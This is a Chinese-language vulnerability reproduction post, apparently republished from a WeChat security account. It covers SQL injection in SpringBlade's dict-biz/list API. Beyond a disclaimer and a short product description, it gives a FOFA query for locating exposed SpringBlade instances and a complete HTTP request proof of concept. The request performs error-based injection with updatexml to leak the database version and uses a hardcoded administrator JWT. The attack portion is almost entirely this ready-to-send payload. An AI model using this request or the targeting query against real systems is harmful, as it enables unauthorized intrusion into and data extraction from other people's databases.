漏洞复现 || SpringBlade dict-biz/list接口SQL注入

admin
admin
admin
104267
文章
87
评论
2024年5月2日01:01:48评论21 views字数 1312阅读4分22秒阅读模式

免责声明

我爱林攻防研究院的技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!

漏洞描述

SpringBlade是一款由商业级项目升级优化而来的微服务架构采用Spring Boot 2.7 、Spring Cloud 2021等核心技术构建,提供基于React及Vue的两个前端框架用来快速搭建企业级得SaaS多租户微服务平台。SpringBlade list接口存在SQL注入漏洞。

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

资产确定

fofa: (((body="https://bladex.vip" || body="Saber 将不能正常工作"))) 

漏洞复现

1.利用如下POC进行报错注入获取版本号

GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1Host: {{Hostname}}Accept-Encoding: gzip, deflateAccept: */*Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7AAccept-Language: zh-CN,zh;q=0.9

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

如有侵权,请联系删除

原文始发于微信公众号(我爱林):漏洞复现 || SpringBlade dict-biz/list接口SQL注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月2日01:01:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 || SpringBlade dict-biz/list接口SQL注入http://cn-sec.com/archives/2704844.html

发表评论

匿名网友 填写信息